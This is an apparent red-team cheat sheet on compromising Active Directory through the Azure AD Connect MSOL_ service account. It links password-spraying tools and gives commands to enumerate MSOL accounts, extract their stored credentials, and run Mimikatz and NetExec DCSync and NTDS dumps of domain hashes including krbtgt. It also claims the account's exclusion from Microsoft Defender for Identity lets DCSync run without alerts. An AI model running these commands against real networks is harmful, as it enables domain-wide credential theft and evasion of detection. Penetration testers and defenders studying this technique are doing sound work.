MSOL (Microsoft Online Services) account

Targeting MSOL Accounts to Compromise Internal NetworksTevora

Brute force

GitHub - dafthack/MSOLSpray: A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled.GitHub

O365 Bruteforce

Enumerate the PHS account and server where AD Connect is installed.

# PowerView
Get-DomainUser -Identity "MSOL_*" -Domain domain.local

# AD module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server domain.local -Properties * | select SamAccountName,Description | fl

Extract MSOL credentials

Administrative privileges needed

@_xpn_ - Azure AD Connect for Red TeamersXPN InfoSec Blog

.\adconnect.ps1

With the password

runas /user:domain.local\MSOL_16fb75d0227d /netonly cmd

DCSync

Because AD Connect synchronizes hashes every two minutes, in an Enterprise Environment, the MSOL_ account will be excluded from tools like MDI. This will allow us to run DCSync without any alerts. 🥳

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local"'

DCSync

NXC

Get MSOL Credentials

nxc smb 10.0.0.8 -u admin01 -p '<-SNIP->' --local-auth -M msol    

MSOL account can perform a DCSync because the MSOL account has the Replicate Directory Changes All permissions

nxc smb 10.0.0.4  -u MSOL_80541c18ebaa -p '<-SNIP->' --ntds

LeHack 2024 - NetExec workshop writeuprayanlecat blog